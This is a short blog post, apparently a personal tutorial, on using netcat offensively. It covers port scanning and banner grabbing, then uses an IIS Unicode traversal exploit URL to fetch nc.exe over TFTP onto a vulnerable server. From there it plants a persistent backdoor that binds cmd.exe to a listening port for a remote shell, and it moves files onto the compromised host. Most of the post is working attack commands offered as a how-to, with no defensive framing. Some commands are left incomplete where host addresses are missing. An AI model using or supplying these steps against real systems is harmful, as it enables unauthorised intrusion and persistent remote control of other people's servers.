Tuesday, January 25, 2022

Another netcat tutorial

 Port scanning 1 through 200:

nc -v -w2 -z 1-200


Banner grabbing with nc:

nc -v -n 80

IIS Unicode File Traversal:\  

Now we want to upload nc.exe to the vulnerable IIS server:

we used:
tftp -I GET nc.exe
is transformed into:
http://<exploit URL>/c+TFTP+-i+

as a TFTP server we can use: TFTPD32 by Ph. Jounin


Netcat as a backdoor:

now we have nc.exe on the server and we want to create a backdoor to get a remote shell.

nc -L -p 1001 -d -e cmd.exe

-L -> do not close and wait for connections.
-p -> port
-d -> detach from the process we want it to run.
-e -> what program to run once the port is connected to (cmd.exe ).

If we not want to convert this command for Unicode URL use, it will look like this:

http://<exploir URL>/c+nc+-L+-p+1001+-d+-e+cmd.exe

nc -v 80



Transferring File with nc.exe:

We want to transfer a file called hack.txt to the IIS Server and we don't want to use TFTP .We can use nc.exe to transfer the file.

To receive a file named hack.txt on the destination system start Netcat on the IIS server with the following command:
nc -l -p 1234>hack.txt

On our source system ( the attacking computer ) we send a file named hack.txt to the IIS machine with the following

nc destination 1234<hack.txt

Now we can see that the file has been transferred to the target system, via port 1234.